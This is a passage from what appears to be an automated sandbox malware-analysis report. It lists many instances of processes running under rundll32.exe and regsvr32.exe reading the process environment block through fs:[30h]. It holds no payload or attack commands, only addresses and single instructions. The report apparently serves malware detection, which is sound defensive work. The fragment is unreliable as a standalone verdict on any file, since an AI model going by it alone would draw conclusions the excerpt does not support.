            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEBB90 mov edx, dword ptr fs:[00000030h]13_2_7EDEBB90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDC86E2 mov eax, dword ptr fs:[00000030h]13_2_7EDC86E2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8780 mov edx, dword ptr fs:[00000030h]13_2_7EDE8780
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDDC4F0 mov ecx, dword ptr fs:[00000030h]13_2_7EDDC4F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEE5D0 mov ecx, dword ptr fs:[00000030h]13_2_7EDEE5D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEC060 mov ecx, dword ptr fs:[00000030h]13_2_7EDEC060
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFE179 mov ecx, dword ptr fs:[00000030h]13_2_7EDFE179
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB4EF1 mov edx, dword ptr fs:[00000030h]13_2_7EDB4EF1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF5EAD mov ecx, dword ptr fs:[00000030h]13_2_7EDF5EAD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFEE57 mov ecx, dword ptr fs:[00000030h]13_2_7EDFEE57
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE19E7B mov eax, dword ptr fs:[00000030h]13_2_7EE19E7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE19E06 mov eax, dword ptr fs:[00000030h]13_2_7EE19E06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBAE34 mov edx, dword ptr fs:[00000030h]13_2_7EDBAE34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF5E22 mov ecx, dword ptr fs:[00000030h]13_2_7EDF5E22
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3FF4 mov edx, dword ptr fs:[00000030h]13_2_7EDB3FF4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3FF4 mov ecx, dword ptr fs:[00000030h]13_2_7EDB3FF4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB6FE0 mov edx, dword ptr fs:[00000030h]13_2_7EDB6FE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3F90 mov edx, dword ptr fs:[00000030h]13_2_7EDB3F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]13_2_7EDB3F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]13_2_7EDB3F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]13_2_7EDB3F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3F90 mov ecx, dword ptr fs:[00000030h]13_2_7EDB3F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB3F90 mov edx, dword ptr fs:[00000030h]13_2_7EDB3F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFEF8D mov ecx, dword ptr fs:[00000030h]13_2_7EDFEF8D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB9FB1 mov edx, dword ptr fs:[00000030h]13_2_7EDB9FB1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDC5F40 mov edx, dword ptr fs:[00000030h]13_2_7EDC5F40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDC5F40 mov eax, dword ptr fs:[00000030h]13_2_7EDC5F40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBEF70 mov eax, dword ptr fs:[00000030h]13_2_7EDBEF70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE7F30 mov ecx, dword ptr fs:[00000030h]13_2_7EDE7F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE7F30 mov eax, dword ptr fs:[00000030h]13_2_7EDE7F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE7F30 mov ecx, dword ptr fs:[00000030h]13_2_7EDE7F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB6C2A mov eax, dword ptr fs:[00000030h]13_2_7EDB6C2A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD1C20 mov eax, dword ptr fs:[00000030h]13_2_7EDD1C20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD1C20 mov eax, dword ptr fs:[00000030h]13_2_7EDD1C20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD1C20 mov edx, dword ptr fs:[00000030h]13_2_7EDD1C20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD1C20 mov eax, dword ptr fs:[00000030h]13_2_7EDD1C20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEADB0 mov ecx, dword ptr fs:[00000030h]13_2_7EDEADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEADB0 mov eax, dword ptr fs:[00000030h]13_2_7EDEADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEADB0 mov ecx, dword ptr fs:[00000030h]13_2_7EDEADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEADB0 mov edx, dword ptr fs:[00000030h]13_2_7EDEADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEADB0 mov eax, dword ptr fs:[00000030h]13_2_7EDEADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDDAD50 mov ecx, dword ptr fs:[00000030h]13_2_7EDDAD50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD1D44 mov eax, dword ptr fs:[00000030h]13_2_7EDD1D44
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD1D44 mov eax, dword ptr fs:[00000030h]13_2_7EDD1D44
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEBD70 mov eax, dword ptr fs:[00000030h]13_2_7EDEBD70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBAD3D mov edx, dword ptr fs:[00000030h]13_2_7EDBAD3D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBAADF mov edx, dword ptr fs:[00000030h]13_2_7EDBAADF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDCAAE0 mov ecx, dword ptr fs:[00000030h]13_2_7EDCAAE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE01A50 mov eax, dword ptr fs:[00000030h]13_2_7EE01A50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD7A11 mov eax, dword ptr fs:[00000030h]13_2_7EDD7A11
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD7A11 mov eax, dword ptr fs:[00000030h]13_2_7EDD7A11
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB6B90 mov eax, dword ptr fs:[00000030h]13_2_7EDB6B90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDEBB80 mov eax, dword ptr fs:[00000030h]13_2_7EDEBB80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFEB49 mov ecx, dword ptr fs:[00000030h]13_2_7EDFEB49
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE9B40 mov eax, dword ptr fs:[00000030h]13_2_7EDE9B40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD38EC mov eax, dword ptr fs:[00000030h]13_2_7EDD38EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD78EC mov eax, dword ptr fs:[00000030h]13_2_7EDD78EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD78EC mov eax, dword ptr fs:[00000030h]13_2_7EDD78EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD78EC mov ecx, dword ptr fs:[00000030h]13_2_7EDD78EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD78EC mov edx, dword ptr fs:[00000030h]13_2_7EDD78EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD78EC mov eax, dword ptr fs:[00000030h]13_2_7EDD78EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF698D mov ecx, dword ptr fs:[00000030h]13_2_7EDF698D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB6980 mov edx, dword ptr fs:[00000030h]13_2_7EDB6980
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF6902 mov ecx, dword ptr fs:[00000030h]13_2_7EDF6902
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8930 mov eax, dword ptr fs:[00000030h]13_2_7EDE8930
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD56B2 mov eax, dword ptr fs:[00000030h]13_2_7EDD56B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD56B2 mov eax, dword ptr fs:[00000030h]13_2_7EDD56B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD56B2 mov eax, dword ptr fs:[00000030h]13_2_7EDD56B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBA6A2 mov edx, dword ptr fs:[00000030h]13_2_7EDBA6A2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFE7CE mov ecx, dword ptr fs:[00000030h]13_2_7EDFE7CE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDC87E6 mov eax, dword ptr fs:[00000030h]13_2_7EDC87E6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD0745 mov eax, dword ptr fs:[00000030h]13_2_7EDD0745
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD0745 mov eax, dword ptr fs:[00000030h]13_2_7EDD0745
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBA72C mov edx, dword ptr fs:[00000030h]13_2_7EDBA72C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB44E4 mov ecx, dword ptr fs:[00000030h]13_2_7EDB44E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB44E4 mov ecx, dword ptr fs:[00000030h]13_2_7EDB44E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB44E4 mov edx, dword ptr fs:[00000030h]13_2_7EDB44E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB8440 mov edx, dword ptr fs:[00000030h]13_2_7EDB8440
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB8440 mov ecx, dword ptr fs:[00000030h]13_2_7EDB8440
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB8440 mov ecx, dword ptr fs:[00000030h]13_2_7EDB8440
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE7460 mov eax, dword ptr fs:[00000030h]13_2_7EDE7460
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBE41E mov edx, dword ptr fs:[00000030h]13_2_7EDBE41E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBE41E mov eax, dword ptr fs:[00000030h]13_2_7EDBE41E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBA415 mov edx, dword ptr fs:[00000030h]13_2_7EDBA415
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov ecx, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov edx, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov ecx, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov eax, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D mov ecx, dword ptr fs:[00000030h]13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB5542 mov ecx, dword ptr fs:[00000030h]13_2_7EDB5542
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB5542 mov eax, dword ptr fs:[00000030h]13_2_7EDB5542
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDC6540 mov eax, dword ptr fs:[00000030h]13_2_7EDC6540
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBA2E1 mov edx, dword ptr fs:[00000030h]13_2_7EDBA2E1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBE090 mov edx, dword ptr fs:[00000030h]13_2_7EDBE090
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F79EF70 mov eax, dword ptr fs:[00000030h]18_2_7F79EF70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7A5F40 mov edx, dword ptr fs:[00000030h]18_2_7F7A5F40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7A5F40 mov eax, dword ptr fs:[00000030h]18_2_7F7A5F40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C7F30 mov ecx, dword ptr fs:[00000030h]18_2_7F7C7F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C7F30 mov eax, dword ptr fs:[00000030h]18_2_7F7C7F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C7F30 mov ecx, dword ptr fs:[00000030h]18_2_7F7C7F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov edx, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov ecx, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov edx, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]18_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793FF4 mov edx, dword ptr fs:[00000030h]18_2_7F793FF4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793FF4 mov ecx, dword ptr fs:[00000030h]18_2_7F793FF4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F796FE0 mov edx, dword ptr fs:[00000030h]18_2_7F796FE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793F90 mov edx, dword ptr fs:[00000030h]18_2_7F793F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]18_2_7F793F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]18_2_7F793F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]18_2_7F793F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]18_2_7F793F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F793F90 mov edx, dword ptr fs:[00000030h]18_2_7F793F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7F9E7B mov eax, dword ptr fs:[00000030h]18_2_7F7F9E7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7F9E4A mov eax, dword ptr fs:[00000030h]18_2_7F7F9E4A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7F9E06 mov eax, dword ptr fs:[00000030h]18_2_7F7F9E06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CBD70 mov eax, dword ptr fs:[00000030h]18_2_7F7CBD70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7BAD50 mov ecx, dword ptr fs:[00000030h]18_2_7F7BAD50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov edx, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov ecx, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov edx, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]18_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CADB0 mov ecx, dword ptr fs:[00000030h]18_2_7F7CADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CADB0 mov eax, dword ptr fs:[00000030h]18_2_7F7CADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CADB0 mov ecx, dword ptr fs:[00000030h]18_2_7F7CADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CADB0 mov edx, dword ptr fs:[00000030h]18_2_7F7CADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CADB0 mov eax, dword ptr fs:[00000030h]18_2_7F7CADB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7F2C38 mov ecx, dword ptr fs:[00000030h]18_2_7F7F2C38
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C8C30 mov ecx, dword ptr fs:[00000030h]18_2_7F7C8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C8C30 mov eax, dword ptr fs:[00000030h]18_2_7F7C8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C8C30 mov edx, dword ptr fs:[00000030h]18_2_7F7C8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C8C30 mov eax, dword ptr fs:[00000030h]18_2_7F7C8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C8C30 mov ecx, dword ptr fs:[00000030h]18_2_7F7C8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F796C2A mov eax, dword ptr fs:[00000030h]18_2_7F796C2A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C9B40 mov eax, dword ptr fs:[00000030h]18_2_7F7C9B40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F796B90 mov eax, dword ptr fs:[00000030h]18_2_7F796B90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CBB90 mov edx, dword ptr fs:[00000030h]18_2_7F7CBB90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CBB80 mov eax, dword ptr fs:[00000030h]18_2_7F7CBB80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7E1A50 mov eax, dword ptr fs:[00000030h]18_2_7F7E1A50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AAAE0 mov ecx, dword ptr fs:[00000030h]18_2_7F7AAAE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C8930 mov eax, dword ptr fs:[00000030h]18_2_7F7C8930
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F796980 mov edx, dword ptr fs:[00000030h]18_2_7F796980
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D5760 mov ecx, dword ptr fs:[00000030h]18_2_7F7D5760
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D5760 mov edx, dword ptr fs:[00000030h]18_2_7F7D5760
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D5760 mov eax, dword ptr fs:[00000030h]18_2_7F7D5760
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D5760 mov ecx, dword ptr fs:[00000030h]18_2_7F7D5760
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C8780 mov edx, dword ptr fs:[00000030h]18_2_7F7C8780
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov ecx, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov ecx, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]18_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7A6540 mov eax, dword ptr fs:[00000030h]18_2_7F7A6540
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CE5D0 mov ecx, dword ptr fs:[00000030h]18_2_7F7CE5D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C7460 mov eax, dword ptr fs:[00000030h]18_2_7F7C7460
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F798440 mov edx, dword ptr fs:[00000030h]18_2_7F798440
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F798440 mov ecx, dword ptr fs:[00000030h]18_2_7F798440
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F798440 mov ecx, dword ptr fs:[00000030h]18_2_7F798440
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7BC4F0 mov ecx, dword ptr fs:[00000030h]18_2_7F7BC4F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7944E4 mov ecx, dword ptr fs:[00000030h]18_2_7F7944E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7944E4 mov ecx, dword ptr fs:[00000030h]18_2_7F7944E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7944E4 mov edx, dword ptr fs:[00000030h]18_2_7F7944E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D6240 mov ecx, dword ptr fs:[00000030h]18_2_7F7D6240
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D6240 mov edx, dword ptr fs:[00000030h]18_2_7F7D6240
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D6240 mov eax, dword ptr fs:[00000030h]18_2_7F7D6240
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D6240 mov ecx, dword ptr fs:[00000030h]18_2_7F7D6240
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CC060 mov ecx, dword ptr fs:[00000030h]18_2_7F7CC060
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_6B4FD480 mov eax, dword ptr fs:[00000030h]36_2_6B4FD480
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F107F30 mov ecx, dword ptr fs:[00000030h]36_2_7F107F30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F107F30 mov eax, dword ptr fs:[00000030h]36_2_7F107F30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F107F30 mov ecx, dword ptr fs:[00000030h]36_2_7F107F30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0E5F40 mov edx, dword ptr fs:[00000030h]36_2_7F0E5F40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0E5F40 mov eax, dword ptr fs:[00000030h]36_2_7F0E5F40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F115760 mov ecx, dword ptr fs:[00000030h]36_2_7F115760
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F115760 mov edx, dword ptr fs:[00000030h]36_2_7F115760
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F115760 mov eax, dword ptr fs:[00000030h]36_2_7F115760
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F115760 mov ecx, dword ptr fs:[00000030h]36_2_7F115760
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0DEF70 mov eax, dword ptr fs:[00000030h]36_2_7F0DEF70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F108780 mov edx, dword ptr fs:[00000030h]36_2_7F108780
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3F90 mov edx, dword ptr fs:[00000030h]36_2_7F0D3F90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]36_2_7F0D3F90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]36_2_7F0D3F90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]36_2_7F0D3F90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]36_2_7F0D3F90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3F90 mov edx, dword ptr fs:[00000030h]36_2_7F0D3F90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D6FE0 mov edx, dword ptr fs:[00000030h]36_2_7F0D6FE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3FF4 mov edx, dword ptr fs:[00000030h]36_2_7F0D3FF4
